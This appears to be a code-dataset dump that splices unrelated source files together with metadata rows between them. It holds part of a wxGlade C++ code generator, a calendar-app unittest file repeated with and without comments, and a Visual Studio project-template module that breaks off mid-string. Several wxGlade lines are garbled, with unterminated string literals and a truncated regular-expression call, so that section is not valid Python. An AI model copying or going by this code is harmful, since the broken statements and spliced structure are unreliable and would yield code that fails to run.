for win_id, evt, handler, evt_type in event_handlers:
if handler not in already_there:
hwrite('%svirtual void %s(%s &event); // wxGlade: <event_handler>\n' % (t, handler, evt_type))
already_there.add( handler )
if classname not in prev_src.event_table_def:
hwrite('\nprotected:\n')
hwrite(self.tabs(1) + 'DECLARE_EVENT_TABLE()\n')
tag = '<%swxGlade event_handlers %s>' % (self.nonce, classname)
if not prev_src.replace_header( tag, "".join(header_buffer) ):
self.warning( "wxGlade events block not found for %s, event table code NOT generated" % code_obj.name )
tab = self.tabs(1)
style_p = code_obj.properties.get("style")
if style_p and style_p.value_set != style_p.default_value:
style = mycn_f(style_p.get_string_value())
if style:
sign_inst = sign_inst.replace('style', '%s' % style)
# constructor
if is_new:
base = "%s(%s)" % (base, sign_inst)
if custom_base:
bases = [b.strip() for b in custom_base.split(',')]
if bases:
base = "%s(%s)" % (bases[0], sign_inst)
rest = ", ".join([b + "()" for b in bases[1:]])
if rest:
base += ", " + rest
swrite('\n%s::%s(%s):\n%s%s\n{\n' % (fmt_klass, fmt_klass, sign_decl2, tab, base) )
if self._mark_blocks:
swrite(tab + '// begin wxGlade: %s::%s\n' % (fmt_klass, fmt_klass))
# the optional initial code from the code properties
if not self.preview and code_obj.check_prop("extracode_pre"):
for l in code_obj.properties["extracode_pre"].get_lines():
swrite(tab + l)
# set size here to avoid problems with splitter windows
if 'size' in code_obj.properties and code_obj.properties["size"].is_active():
swrite( tab + self.generate_code_size(code_obj) )
for l in builder.get_properties_code(code_obj):
swrite(tab + l)
for l in klass.init:
swrite(tab + l)
if klass.final:
swrite(tab + "\n")
for l in klass.final:
swrite(tab + l)
for l in builder.get_layout_code(code_obj):
swrite(tab + l)
# the optional final code from the code properties
if not self.preview and code_obj.check_prop("extracode_post"):
for l in code_obj.properties["extracode_post"].get_lines():
swrite(tab + l)
# now check if there are extra lines to add to the constructor
for l in builder.get_init_code(code_obj):
swrite(tab + l)
swrite( self.tmpl_ctor_call_layout % {'tab':tab} )
if self._mark_blocks:
# end tag
swrite('%s%s end wxGlade\n' % (tab, self.comment_sign))
# write class function end statement
if self.tmpl_cfunc_end and is_new:
swrite( self.tmpl_cfunc_end % {'tab':tab} )
# replace code inside existing constructor block
if prev_src and not is_new:
# replace the lines inside the ctor wxGlade block
# with the new ones
tag = '<%swxGlade replace %s %s>' % (self.nonce, classname, classname)
if not prev_src.replace( tag, "".join(source_buffer) ):
# no constructor tag found, issue a warning and do nothing
self.warning( "wxGlade %s::%s block not found, relative code NOT generated" % (fmt_klass, fmt_klass) )
source_buffer = []
swrite = source_buffer.append
# generate code for event table
code_lines = self.generate_code_event_table( code_obj, is_new, tab, prev_src, event_handlers )
if prev_src and not is_new:
tag = '<%swxGlade replace %s event_table>' % (self.nonce, classname)
if not prev_src.replace( tag, "".join(code_lines) ):
# no constructor tag found, issue a warning and do nothing
self.warning( "wxGlade %s::event_table block not found, relative code NOT generated" % fmt_klass )
else:
source_buffer.extend(code_lines)
# generate code for event handler stubs
code_lines = self.generate_code_event_handler( code_obj, is_new, tab, prev_src, event_handlers )
# replace code inside existing event handlers
if prev_src and not is_new:
tag = '<%swxGlade add %s event handlers>' % (self.nonce, classname)
if not prev_src.replace( tag, "".join(code_lines) ):
# no constructor tag found, issue a warning and do nothing
self.warning( "wxGlade %s event handlers marker not found, relative code NOT generated" % fmt_klass )
else:
source_buffer.extend(code_lines)
if not self.multiple_files and prev_src:
# if this is a new class, add its code to the new_classes list of the SourceFileContent instance
if is_new:
prev_src.new_classes.append( ("".join(header_buffer), "".join(source_buffer)) )
return
if self.multiple_files:
if base in self.obj_builders:
klass.dependencies.update( getattr(self.obj_builders[base], 'import_modules', []) )
if prev_src:
tag = '<%swxGlade insert new_classes>' % self.nonce
prev_src.replace_header(tag, "")
# insert the module dependencies of this class
# WARNING: there's a double space ' ' between 'replace' and 'dependencies' in the tag below,
tag = '<%swxGlade replace dependencies>' % self.nonce
code = self._format_dependencies(klass.dependencies)
prev_src.replace_header(tag, code)
extra_code_h = "".join(klass.extra_code_h[::-1])
extra_code_cpp = "".join(klass.extra_code_cpp[::-1])
if extra_code_h or extra_code_cpp:
self.warning( '%s (or one of its children) has extra code classes, but you are not overwriting '
'existing sources: please check that the resulting code is correct!' % code_obj.name )
extra_code_h = self._tagcontent("::extracode", extra_code_h)
extra_code_cpp = self._tagcontent("::extracode", extra_code_cpp)
tag = '<%swxGlade replace extracode>' % self.nonce
prev_src.replace_header(tag, extra_code_h)
prev_src.replace(tag, extra_code_cpp)
# store the new file contents to disk
name = os.path.join(self.out_dir, classname)
self.save_file( name +"."+ self.header_extension, "".join(prev_src.header_content), content_only=True )
self.save_file( name +"."+ self.source_extension, "".join(prev_src.content), content_only=True )
return
# create the new source file
header_file = os.path.join(self.out_dir, classname + "." + self.header_extension)
source_file = os.path.join(self.out_dir, classname + "." + self.source_extension)
hout = []
sout = []
# header file ----------------------------------------------------------------------------------------------
# isolation directives
hn = os.path.basename(header_file).upper().replace('.', '_')
hout.append(''\n')
# write the common lines
hout.extend( self.header_lines )
hout.append('\n')
# write the module dependencies for this class
code = self._format_dependencies(klass.dependencies)
hout.append(code)
hout.append('\n')
# insert the extra code of this class
extra_code_h = "".join(klass.extra_code_h[::-1])
extra_code_h = self._tagcontent('::extracode', extra_code_h)
hout.append(extra_code_h)
hout.append('\n')
# write the class body
for line in header_buffer:
hout.append(line)
hout.append('\n
# source file ----------------------------------------------------------------------------------------------
# write the common lines
sout.append(self.header_lines[0])
sout.append('
# insert the extra code of this class
extra_code_cpp = "".join(klass.extra_code_cpp[::-1])
extra_code_cpp = self._tagcontent('::extracode', extra_code_cpp)
sout.append(extra_code_cpp)
sout.append('\n')
# write the class implementation
sout.extend(source_buffer)
# store source to disk
self.save_file(header_file, hout)
self.save_file(source_file, sout)
else: # not self.multiple_files
# write the class body onto the single source file
self.output_header.extend(header_buffer)
self.output_file.extend(source_buffer)
def add_object(self, klass, parent, parent_builder, obj):
# get the widget builder instance
builder = self._get_object_builder(klass, obj)
if not builder: return None
try:
init, ids, final = builder.get_code(obj)
except:
print(obj)
raise # this shouldn't happen
if not obj.IS_SIZER:
if obj.check_prop_truth("extracode_pre"):
init = obj.properties["extracode_pre"].get_lines() + init
if obj.check_prop_truth("extracode_post"):
init += obj.properties["extracode_post"].get_lines()
if obj.check_prop_truth('extraproperties'):
init += self.generate_code_extraproperties(obj)
mycn = getattr(builder, 'cn', self.cn)
for win_id, evt, handler, evt_type in builder.get_event_handlers(obj):
klass.event_handlers.append( (win_id, mycn(evt), handler, evt_type) )
extra_code = getattr(builder, 'extracode', getattr(obj, 'extracode', "") or "" )
if extra_code:
extra_code = re.sub(r'\\n', '\n', extra_code)
extra_code = re.split(re.compile(r'^ if len(extra_code) > 1:
klass.extra_code_cpp.append(extra_code[1])
# if we are not overwriting existing source, warn the user about the presence of extra code
if not self.multiple_files and self.previous_source:
self.warning( '%s has extra code, but you are not overwriting existing sources: please check '
'that the resulting code is correct!' % obj.name )
klass.ids.extend(ids)
if self.store_as_attr(obj):
if obj.check_prop("instance_class"):
klassname = obj.instance_class
else:
klassname = obj.get_prop_value("class", obj.WX_CLASS)
klass.sub_objs.append( (klassname, obj.name) )
klass.init.extend(init)
if parent_builder: # add to sizer or notebook
klass.init.extend( parent_builder.get_code_per_child(parent, obj) )
klass.final[:0] = final
if self.multiple_files and obj.IS_CLASS:
klass.dependencies.append(obj.klass)
else:
if obj.WX_CLASS in self.obj_builders:
headers = getattr(self.obj_builders[obj.WX_CLASS], 'import_modules', [])
klass.dependencies.update(headers)
return builder
def generate_code_event_handler(self, code_obj, is_new, tab, prev_src, event_handlers):
code_lines = []
swrite = code_lines.append
if not event_handlers:
return []
tmpl_handler = """
void %(klass)s::%(handler)s(%(evt_type)s &event) // wxGlade: %(klass)s.<event_handler>
{
%(tab)sevent.Skip();
%(tab)s// notify the user that he hasn't implemented the event handler yet
%(tab)swxLogDebug(wxT("Event handler (%(klass)s::%(handler)s) not implemented yet"));
}
"""
if prev_src:
already_there = prev_src.event_handlers.get(code_obj.klass, set())
else:
already_there = set()
for win_id, event, handler, evt_type in event_handlers:
if handler not in already_there:
swrite( tmpl_handler % {'evt_type': evt_type, 'handler': handler, 'klass': code_obj.klass, 'tab': tab} )
already_there.add( handler )
if is_new or not prev_src:
swrite('\n\n')
swrite('// wxGlade: add %s event handlers\n' % code_obj.klass)
if is_new or not prev_src:
swrite('\n')
return code_lines
def generate_code_event_table(self, code_obj, is_new, tab, prev_src, event_handlers):
code_lines = []
write = code_lines.append
if not event_handlers:
return code_lines
if prev_src and code_obj.klass in prev_src.event_table_decl:
has_event_table = True
else:
has_event_table = False
if is_new or not has_event_table:
write('\nBEGIN_EVENT_TABLE(%s, %s)\n' % (code_obj.klass, code_obj.WX_CLASS))
write(tab + '// begin wxGlade: %s::event_table\n' % code_obj.klass)
for obj, event, handler, evt_type in event_handlers:
if obj is None: continue
if isinstance(obj, str):
win_id = obj
else:
win_id = self.generate_code_id(obj)[1]
if 'EVT_NAVIGATION_KEY' in event:
tmpl = '%(tab)s%(event)s(%(klass)s::%(handler)s)\n'
else:
tmpl = '%(tab)s%(event)s(%(win_id)s, %(klass)s::%(handler)s)\n'
details = { 'tab': tab, 'event': event, 'win_id': win_id, 'klass': code_obj.klass, 'handler': handler }
write(tmpl % details)
write(tab + '// end wxGlade\n')
if is_new or not has_event_table:
write('END_EVENT_TABLE();\n\n')
return code_lines
def generate_code_id(self, obj, id=None):
if id is None:
id = obj.window_id
if not id:
if obj is not None and obj.check_prop_truth("stockitem"):
return '', "wxID_" + obj.stockitem
return '', 'wxID_ANY'
id = str(id)
tokens = id.split('=', 1)
if len(tokens) != 2:
return '', tokens[0]
name, val = tokens
if not name:
return '', val
name = name.strip()
val = val.strip()
if val == '?':
val = self.generated_ids.get(name)
if val is None:
val = 'wxID_HIGHEST + %d' % self.last_generated_id
self.last_generated_id += 1
self.generated_ids[name] = val
else:
val = val
return '%s = %s' % (name, val), name
def generate_code_size(self, obj):
objname = self.format_generic_access(obj)
if obj.IS_CLASS:
name2 = 'this'
else:
name2 = obj.name
size = obj.properties["size"].get_string_value()
use_dialog_units = (size[-1] == 'd')
method = 'SetMinSize' if obj.parent_window else 'SetSize'
if use_dialog_units:
return '%s%s(wxDLG_UNIT(%s, wxSize(%s)));\n' % (objname, method, name2, size[:-1])
return '%s%s(wxSize(%s));\n' % (objname, method, size)
def quote_path(self, s):
return 'wxT(%s)' % super(CPPCodeWriter, self).quote_path(s)
def _quote_str(self, s):
if self._use_gettext:
return '_("%s")' % s
return 'wxT("%s")' % s
def format_generic_access(self, obj):
if obj.IS_CLASS:
return ''
return '%s->' % obj.name
def _format_dependencies(self, dependencies):
dep_list = []
for dependency in sorted(dependencies):
if dependency and ('"' != dependency[0] != '<'):
dep_list.append('#include "%s.h"\n' % dependency)
else:
dep_list.append('#include %s\n' % dependency)
return self._tagcontent( '::dependencies', dep_list )
writer = CPPCodeWriter() # The code writer is an instance of CPPCodeWriter
language = writer.language # Language generated by this code generator
| true | true |
f710299efd3e51d5e4b2e5cd7c0de74cacf615c7 | 3,230 | py | Python | tests/calendar_models_test.py | C4theBomb/python-calendar-app | 6776403f7f2440c6497d9a53be5e8d617a2ee817 | [
"MIT"
] | null | null | null | tests/calendar_models_test.py | C4theBomb/python-calendar-app | 6776403f7f2440c6497d9a53be5e8d617a2ee817 | [
"MIT"
] | null | null | null | tests/calendar_models_test.py | C4theBomb/python-calendar-app | 6776403f7f2440c6497d9a53be5e8d617a2ee817 | [
"MIT"
] | null | null | null | import sys
import os
from io import StringIO
from datetime import datetime
import unittest
from unittest.mock import patch
sys.path.append(os.path.abspath("./src/"))
from calendarApp.models import Event, Calendar
class CalendarModelTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.data1 = {
"name": "Test Event 1",
"start_time": "01/01/2000 00:00:00",
"end_time": "01/01/2001 00:00:00"
}
cls.data2 = {
"name": "Test Event 2",
"start_time": "01/01/2001 00:00:00",
"end_time": "01/01/2002 00:00:00"
}
@classmethod
def tearDownClass(cls):
del cls.data1
del cls.data2
def setUp(self):
self.calendar = Calendar("Test")
def tearDown(self):
del self.calendar
def test_event_add(self):
# Test Configuration and Setup
with patch('sys.stdout', StringIO()) as print_output:
# Test Function
self.calendar.add_event(
self.data1["name"], self.data1["start_time"], self.data1["end_time"])
calendar_event = self.calendar.schedule[0]
# Test Assertions
self.assertEqual(
f"[INFO] Event {self.data1['name']} added", print_output.getvalue().rstrip())
self.assertEqual(self.data1["name"], calendar_event.name)
def test_event_delete(self):
# Test Configuration and Setup
self.calendar.schedule = [
Event(
self.data1["name"], self.data1["start_time"], self.data1["end_time"])
]
calendar_event = self.calendar.schedule[0]
with patch('sys.stdout', StringIO()) as print_output:
# Test Function
self.calendar.delete_event([str(calendar_event.id)])
# Test Assertions
self.assertEqual(
f"[INFO] Event(s) ['{calendar_event.id}'] removed", print_output.getvalue().rstrip())
self.assertFalse(self.calendar.schedule)
def test_event_order(self):
# Test Configuration and Setup
self.calendar.schedule = [
Event(
self.data2["name"], self.data2["start_time"], self.data2["end_time"]),
Event(
self.data1["name"], self.data1["start_time"], self.data1["end_time"])
]
# Test Function
self.calendar.order_events()
# Test Assertions
self.assertLess(
self.calendar.schedule[0].start_time, self.calendar.schedule[1].start_time)
def test_event_print(self):
# Test Configuration and Setup
self.calendar.schedule = [
Event(
self.data1["name"], self.data1["start_time"], self.data1["end_time"]),
Event(
self.data2["name"], self.data2["start_time"], self.data2["end_time"])
]
# Test Assertions
with patch('sys.stdout', StringIO()) as print_output:
self.calendar.print_events()
self.assertTrue(self.data1["name"] in print_output.getvalue())
self.assertTrue(self.data2["name"] in print_output.getvalue())
if __name__ == "__main__":
unittest.main()
| 31.666667 | 101 | 0.583901 | import sys
import os
from io import StringIO
from datetime import datetime
import unittest
from unittest.mock import patch
sys.path.append(os.path.abspath("./src/"))
from calendarApp.models import Event, Calendar
class CalendarModelTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.data1 = {
"name": "Test Event 1",
"start_time": "01/01/2000 00:00:00",
"end_time": "01/01/2001 00:00:00"
}
cls.data2 = {
"name": "Test Event 2",
"start_time": "01/01/2001 00:00:00",
"end_time": "01/01/2002 00:00:00"
}
@classmethod
def tearDownClass(cls):
del cls.data1
del cls.data2
def setUp(self):
self.calendar = Calendar("Test")
def tearDown(self):
del self.calendar
def test_event_add(self):
with patch('sys.stdout', StringIO()) as print_output:
self.calendar.add_event(
self.data1["name"], self.data1["start_time"], self.data1["end_time"])
calendar_event = self.calendar.schedule[0]
self.assertEqual(
f"[INFO] Event {self.data1['name']} added", print_output.getvalue().rstrip())
self.assertEqual(self.data1["name"], calendar_event.name)
def test_event_delete(self):
self.calendar.schedule = [
Event(
self.data1["name"], self.data1["start_time"], self.data1["end_time"])
]
calendar_event = self.calendar.schedule[0]
with patch('sys.stdout', StringIO()) as print_output:
self.calendar.delete_event([str(calendar_event.id)])
self.assertEqual(
f"[INFO] Event(s) ['{calendar_event.id}'] removed", print_output.getvalue().rstrip())
self.assertFalse(self.calendar.schedule)
def test_event_order(self):
self.calendar.schedule = [
Event(
self.data2["name"], self.data2["start_time"], self.data2["end_time"]),
Event(
self.data1["name"], self.data1["start_time"], self.data1["end_time"])
]
self.calendar.order_events()
self.assertLess(
self.calendar.schedule[0].start_time, self.calendar.schedule[1].start_time)
def test_event_print(self):
self.calendar.schedule = [
Event(
self.data1["name"], self.data1["start_time"], self.data1["end_time"]),
Event(
self.data2["name"], self.data2["start_time"], self.data2["end_time"])
]
with patch('sys.stdout', StringIO()) as print_output:
self.calendar.print_events()
self.assertTrue(self.data1["name"] in print_output.getvalue())
self.assertTrue(self.data2["name"] in print_output.getvalue())
if __name__ == "__main__":
unittest.main()
| true | true |
f71029e0362daf93beff056b71cb94f06389a620 | 15,953 | py | Python | lib/tpn/visualstudio/templates.py | tpn/tpn | 5c0fcc3c4b264dfb95b5029864c6006530150c85 | [
"MIT"
] | 2 | 2020-01-08T02:19:18.000Z | 2022-01-11T09:06:03.000Z | lib/tpn/visualstudio/templates.py | tpn/tpn | 5c0fcc3c4b264dfb95b5029864c6006530150c85 | [
"MIT"
] | null | null | null | lib/tpn/visualstudio/templates.py | tpn/tpn | 5c0fcc3c4b264dfb95b5029864c6006530150c85 | [
"MIT"
] | 1 | 2020-12-30T22:21:14.000Z | 2020-12-30T22:21:14.000Z | """Visual Studio Helper Utils."""
#===============================================================================
# Imports
#===============================================================================
import uuid
#===============================================================================
# Globals
#===============================================================================
vcxproj_template = """\
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="PGInstrument|Win32">
<Configuration>PGInstrument</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="PGInstrument|x64">
<Configuration>PGInstrument</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="PGUpdate|Win32">
<Configuration>PGUpdate</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="PGUpdate|x64">
<Configuration>PGUpdate</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>%(guid)s</ProjectGuid>
<RootNamespace>%(name)s</RootNamespace>
<Keyword>Win32Proj</Keyword>
</PropertyGroup>
<PropertyGroup Label="UserMacros">
<%(dirname_macro_name)s>%(dirname_macro_value)s</%(dirname_macro_name)s>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='PGUpdate|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='PGInstrument|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='PGUpdate|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='PGInstrument|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>NotSet</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='PGUpdate|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(name)s.props" />
<Import Project="%(pcbuild_prefix)spyd.props" />
<Import Project="%(pcbuild_prefix)spgupdate.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='PGInstrument|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(name)s.props" />
<Import Project="%(pcbuild_prefix)spyd.props" />
<Import Project="%(pcbuild_prefix)spginstrument.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(pcbuild_prefix)s%(name)s.props" />
<Import Project="%(pcbuild_prefix)spyd.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(name)s.props" />
<Import Project="%(name)s_debug.props" />
<Import Project="%(pcbuild_prefix)spyd_d.props" />
<Import Project="%(pcbuild_prefix)sdebug.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='PGUpdate|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(name)s.props" />
<Import Project="%(pcbuild_prefix)spyd.props" />
<Import Project="%(pcbuild_prefix)sx64.props" />
<Import Project="%(pcbuild_prefix)spgupdate.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='PGInstrument|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(name)s.props" />
<Import Project="%(pcbuild_prefix)spyd.props" />
<Import Project="%(pcbuild_prefix)sx64.props" />
<Import Project="%(pcbuild_prefix)spginstrument.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(name)s.props" />
<Import Project="%(pcbuild_prefix)spyd.props" />
<Import Project="%(pcbuild_prefix)sx64.props" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
<Import Project="%(name)s.props" />
<Import Project="%(name)s_debug.props" />
<Import Project="%(pcbuild_prefix)spyd_d.props" />
<Import Project="%(pcbuild_prefix)sdebug.props" />
<Import Project="%(pcbuild_prefix)sx64.props" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='PGInstrument|Win32'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='PGInstrument|Win32'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='PGInstrument|Win32'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='PGInstrument|x64'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='PGInstrument|x64'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='PGInstrument|x64'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='PGUpdate|Win32'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='PGUpdate|Win32'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='PGUpdate|Win32'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='PGUpdate|x64'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='PGUpdate|x64'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='PGUpdate|x64'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" />
<CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Release|x64'">AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Release|x64'" />
<CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Release|x64'" />
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='PGInstrument|Win32'">
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='PGInstrument|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='PGUpdate|Win32'">
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='PGUpdate|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<AdditionalIncludeDirectories>%%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>%(exception_handling)s
</ClCompile>
</ItemDefinitionGroup>
%(includes)s
%(compiles)s
%(resources)s
%(others)s<ItemGroup>
<ProjectReference Include="pythoncore.vcxproj">
<Project>{cf7ac3d1-e2df-41d2-bea6-1e2556cdea26}</Project>
</ProjectReference>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>"""
vcxproj_filters_template = """\
<?xml version="1.0" encoding="utf-8"?>
